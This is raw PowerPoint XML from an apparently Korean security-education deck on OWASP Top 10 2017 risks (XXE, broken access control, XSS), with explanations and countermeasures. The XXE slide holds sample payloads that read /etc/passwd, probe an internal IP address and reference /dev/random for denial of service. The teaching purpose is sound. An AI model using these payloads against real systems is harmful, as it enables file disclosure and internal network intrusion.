            <a:ext cx="251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URLs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5AFB5C-8A63-400C-B9FC-B731158ED2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8372837" y="4571326"/>
            <a:ext cx="2510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Expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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languages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BC78B2-17E5-489B-9FC2-62BF3A8B8C44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종류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88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XML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외부 개체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(XXE)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A4:2017.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취약점 소개</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 4" descr="C:\Users\Administrator\Downloads\hac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51" y="2847031"/>
            <a:ext cx="1203054" cy="12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94" y="2722298"/>
            <a:ext cx="1452521" cy="14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istrator\Downloads\skull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07" y="5002221"/>
            <a:ext cx="1014185" cy="91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231372" y="3466938"/>
            <a:ext cx="5928259" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF66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259398" y="2917112"/>
            <a:ext cx="1062892" cy="1062892"/>
            <a:chOff x="5914135" y="2897554"/>
            <a:chExt cx="1062892" cy="1062892"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\Administrator\Downloads\xm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135" y="2897554"/>
              <a:ext cx="1062892" cy="106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Administrator\Downloads\skull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861" y="2897554"/>
              <a:ext cx="414215" cy="372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직선 화살표 연결선 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2050" idx="2"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6096000" y="3980004"/>
            <a:ext cx="1694844" cy="102221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3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6603092" y="4174819"/>
            <a:ext cx="3433762" cy="128374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30386" y="2391103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Hacker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11201" y="1993782"/>
            <a:ext cx="23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외부 개체로 향하는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p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악의적인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URL</a:t>
            </a:r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이 삽입된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF Bold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74508" y="6010115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외부 개체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15362" y="2340453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피해자</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2501542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XML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외부 개체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(XXE)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A4:2017.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공격 시나리오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1957" y="1919416"/>
            <a:ext cx="93853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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [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&lt;!ELEMENT foo ANY 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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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 SYSTEM "file:///etc/passwd" &gt;]&gt;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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"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;&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [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&lt;!ELEMENT foo ANY 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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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 SYSTEM "https://192.168.1.1/private" &gt;]&gt;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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"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;&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [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&lt;!ELEMENT foo ANY &gt;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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;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</a:t>
            </a:r>
          </a:p>
          <a:p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	&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>xxe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;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF Light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1956" y="1875869"/>
            <a:ext cx="6307450" cy="1381133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1957" y="3359327"/>
            <a:ext cx="6307451" cy="1381133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11957" y="4839781"/>
            <a:ext cx="6307451" cy="1381133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219406" y="4049892"/>
            <a:ext cx="1140823" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF99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7219405" y="2566435"/>
            <a:ext cx="1140823" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF99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7219405" y="5530347"/>
            <a:ext cx="1140823" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF99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487069" y="2381770"/>
            <a:ext cx="313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Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서버에서 데이터 가져오기 시도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87069" y="3865227"/>
            <a:ext cx="313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Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>사설망을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 검색 시도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87069" y="5345681"/>
            <a:ext cx="313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Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서비스 거부 공격 시도</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="456587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민감한 데이터 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A3:2017.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OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>보안대책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957" y="1919416"/>
            <a:ext cx="9385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가능한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JSON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과 같은 덜 복잡한 데이터 형식을 사용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or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민감한 데이터 지양</a:t>
            </a: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모든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XML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프로세서 및 라이브러리를 최신버전으로 업그레이드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서버에서 화이트리스트를 이용한 </a:t>
            </a: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입력값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 검증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필터링을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 통해 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XML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문서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헤더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노드에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 삽입된 악의적인 데이터 차단</a:t>
            </a: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XML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외부 개체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DTD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처리를 비활성화</a:t>
            </a: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API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보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>게이트웨이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, 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웹 어플리케이션 방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>사용에 대한 고려</a:t>
            </a:r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  <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF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520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A5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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517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B6C365-2D96-47F8-B345-011E742CBA5A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CB6FCB-08EC-49CE-AB48-F12E0405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" y="2073621"/>
            <a:ext cx="10713442" cy="36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79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접근 통제는 애플리케이션의 핵심 보안 메커니즘 중 한 요소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세션을 관리하고 사용자를 인증하기 위해서 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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애플리케이션에서 접근 통제가 가장 필요한 이유는 사용자의 요청이 특정 자원에 접근하려고 할 때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허가된 요청인지 아닌지를 결정하는 방법이 필요하기 때문</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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해외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penetration Tester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전문가인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Dafydd Studdard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따르면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테스트한 애플리케이션의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71%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 접근 통제 취약점을 가지고 있음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77831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접근 통제는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수직적인 부분</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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수평적인 부분</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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문맥 의존적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1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(context-dependent)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부분으로 구성된다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수직적 접근 통제는 애플리케이션 기능에 따라서 사용자의 접근을 허용할지 결정하는 방식</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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수평적 접근 통제는 사용자에게 동일한 형태의 자원에 접근할 수 있는 규칙을 제공한다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온라인 뱅킹에서 계좌 출금 기능이나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웹 메일에서 자신의 메일을 보는 경우</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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문맥 의존적 접근 통제는 현재 주어진 애플리케이션 상태가 무엇인지에 따라</a:t>
            </a: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사용자의 접근을 제한하는 것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다단계 프로세스 처리 경우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1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2083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9571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E4E02C-A1EC-47EB-A3F8-8E7E2AB69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531"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="764380" y="2143713"/>
            <a:ext cx="10663240" cy="405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BB1CA-EDF5-41E6-988D-AAFF9B0B2852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서버에서 업로드 하는 악성 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JSP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파일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33B18-4B16-4265-85DA-8CAB93661992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679500" y="3024694"/>
            <a:ext cx="51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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일 생성 전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B550F-06E3-46C2-8FA1-A2E5152C0D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049847" y="31889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96C59-8817-4181-98D8-EDD9B5564BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7956062" y="35990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5AF81-8771-4A28-A3F3-3DEDA69AAE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234953" y="4259998"/>
            <a:ext cx="43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//“myfile.jsp is running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 띄우는 알람창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39C70-7050-4D59-AB31-BBDE01AB005A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186794" y="2919726"/>
            <a:ext cx="43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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 생성 전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2CF39-F861-423F-A6EC-0F99074A987E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337714" y="3223467"/>
            <a:ext cx="43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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일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EFC09-B36D-4E88-BD19-9D5C2742B869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219128" y="3685613"/>
            <a:ext cx="43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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 경로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3332166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접근 통제는 공격자가 접근 제어 검사 또는 메타 데이터를 수정할 수 없는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="27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7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신뢰할 수 있는 서버 측 코드 또는 서버가 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="27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적용될 경우에만 효과적임</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="27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7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0E71E-71A6-4D0A-A7E5-2911FBE6EF0C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취약한 접근 통제 보안 대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251504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취약한 접근 통제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A5:2017.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B8A12-4679-4FDA-ACFC-4E5B8E1772E9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불특정 다수에게 공개된 자원을 제외하고는 디폴트 정책은 차단으로 운영해야 함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접근 통제 모델은 사용자에게 특정 레코드를 생성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/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열람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/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수정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/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삭제 할 수 있는 권한을 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허용하기 보다 레코드 소유자만 권한을 갖게 끔 강제해야 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3)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접근 통제에 실패한 경우에는 기록되어야 하고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반복적으로 실패가 발생되는 경우 관리자에게 경고 메시지가 전송되어야 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4) JWT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토큰은 로그아웃 이후에 무효화 되어야 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0E71E-71A6-4D0A-A7E5-2911FBE6EF0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631494" y="1499859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취약한 접근 통제 보안 대책</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26094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ACC02C1D-F857-4281-BF1E-30942D30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E11B6-BB20-42DE-B5BE-5EA3C50C3C80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B65C5-23CB-496A-A71C-92652EBCC3F7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70A97-1824-4AC3-8602-CC1B0B64DD5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BC78B2-17E5-489B-9FC2-62BF3A8B8C44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소개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722C13-0753-4EFC-8F9C-3832C70C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083" y="2257484"/>
            <a:ext cx="9281787" cy="35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1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8238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A7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 </a:t>
            </a:r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68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AEC58-C448-4D61-830D-B25FBC9E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94" y="2257484"/>
            <a:ext cx="10401211" cy="32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6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XSS(Cross-site scripting)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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는 웹 상에서 가장 기초적인 취약점 공격 방법의 일종으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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악의적인 사용자가 공격하려는 사이트에 스크립트를 넣는 기법을 말한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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747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1. 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공격자는 미리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xss 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공격에 취약한 웹 사이트를 탐색하고 공격을 위한 스크립트를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="23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포함 한 다음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url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사용자에게 노출시킨다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23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966B5-FEC1-4F22-B813-6EAEDD1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60" y="2141409"/>
            <a:ext cx="6966679" cy="3130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순서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F13B8-5D38-4887-A548-A34FA55E5B08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798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2. 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사용자가 해당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url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클릭 할 경우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</a:p>
          <a:p>
            <a:pPr algn="ctr"/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취약한 웹 사이트의 서버에 스크립트가 포함 된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Url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통해서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request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전송한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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966B5-FEC1-4F22-B813-6EAEDD1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60" y="2141409"/>
            <a:ext cx="6966679" cy="3130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순서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0FA67-B9A1-4C1C-9F19-1CC133D7A16B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178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3. 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웹 서버에서는 해당 스크립트를 포함한 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response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endParaRPr lang="en-US" altLang="ko-KR" sz="23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전송하게 되며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공격을 성공하게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="23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966B5-FEC1-4F22-B813-6EAEDD1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60" y="2141409"/>
            <a:ext cx="6966679" cy="3130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순서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B161E-8A83-498C-8170-54406C5A79E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322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Stored xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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reflected xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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와 다르게 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="280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웹 사이트 게시판에 스크립트를 삽입하는 공격 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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공격자는 게시판에 스크립트를 삽입한 후에 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="280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공격 대상자가 해당 게시글을 클릭하도록 유도한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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7845E-B86B-40C4-A94C-F3FC88AABBA1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626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공격자가 미리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xss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공격에 취약한 웹사이트 탐색 후 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Xss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공격을 위한 스크립트를 포함 한 게시글을 웹 사이트에 업로드 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C1C434-7458-4C50-BB19-359C6379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48" y="2141409"/>
            <a:ext cx="6392103" cy="3193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F0C28-EC7A-4D20-A823-40BB1FB0A4DD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36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게시글의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url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사용자에게 노출하고 사용자가 게시글을 확인함으로써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Url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대한 요청을 서버에 전송하게 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9590D3-763F-4C68-8BE0-E1B2D251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48" y="2141409"/>
            <a:ext cx="6392103" cy="3193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9F2AD-FE0B-46FE-8E04-E2EA39BEB399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483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웹 서버에서 스크립트를 포함한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response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전송하며 공격이 수행된다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9590D3-763F-4C68-8BE0-E1B2D251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48" y="2141409"/>
            <a:ext cx="6392103" cy="3193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F616-F1E9-4CA6-93EF-367311662108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8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그림 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01EA5563-E493-4061-8031-AB6532C02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B65C5-23CB-496A-A71C-92652EBCC3F7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70A97-1824-4AC3-8602-CC1B0B64DD51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04CE179-FEDD-47F4-A770-C67C13CF0E5A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F5A267BD-D88F-47C3-AA7D-C61E1C47CC9A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SQL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0E614D94-6337-4387-938C-3920D251D002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1285889" y="1402080"/>
            <a:ext cx="6334113" cy="4970482"/>
            <a:chOff x="2856709" y="1465234"/>
            <a:chExt cx="6334113" cy="4970482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="307" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2876813C-6912-4253-8602-E768A25CB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984" y="3282921"/>
              <a:ext cx="2355850" cy="1651000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 18847"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF3300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endParaRPr lang="ar-SA" altLang="ko-KR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="308" name="Line 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9079F406-CCA6-4B2D-9544-8EA9C419F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38109" y="2562196"/>
              <a:ext cx="431800" cy="622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9" name="Text Box 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F27F8E-F8EA-4768-A554-92E90C813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234" y="2268509"/>
              <a:ext cx="10620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Replication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Text Box 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A81E22-7144-4556-BCC0-30A50E9B4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4909" y="3298796"/>
              <a:ext cx="7762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Backup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="311" name="Text Box 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FEE7FD1-6681-47CF-8CE7-12FDEF180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3522" y="2231996"/>
              <a:ext cx="5095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Wiki</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="312" name="Text Box 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4955B605-822A-48FE-AFB8-343D4F3AA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859" y="3374996"/>
              <a:ext cx="503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Blog</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="313" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5B1D1C-4F0C-4F4D-8DBD-9C7E86A9D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2547" y="2679671"/>
              <a:ext cx="9032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Reporting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="314" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCEA321D-A0D7-4E26-ABA9-99A2CB98C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5234" y="1822421"/>
              <a:ext cx="7651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Testing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Text Box 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61882BA5-85C9-49CE-949D-479296858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7672" y="2751109"/>
              <a:ext cx="7286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Forums</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="316" name="Text Box 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999A4FEA-DE3A-4A61-9F19-CD1A2AB11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709" y="5051396"/>
              <a:ext cx="1357313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High privileged</a:t>
              </a:r>
            </a:p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users</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="317" name="Text Box 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65CC1413-964D-4201-8DBF-EFE6F101D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4709" y="5737196"/>
              <a:ext cx="1052513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Application</a:t>
              </a:r>
            </a:p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Users</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="318" name="Text Box 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D2BDDD9-22F8-4CF4-9DDC-732103A70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1509" y="5229196"/>
              <a:ext cx="13176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Administrators</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="319" name="Text Box 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA2DEBF2-2893-4585-84E8-2434C1466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309" y="5737196"/>
              <a:ext cx="1219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Casual users</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C26072F-4872-4F49-A9B6-6E8D0B2A55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1809" y="3476596"/>
              <a:ext cx="685800" cy="203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1" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
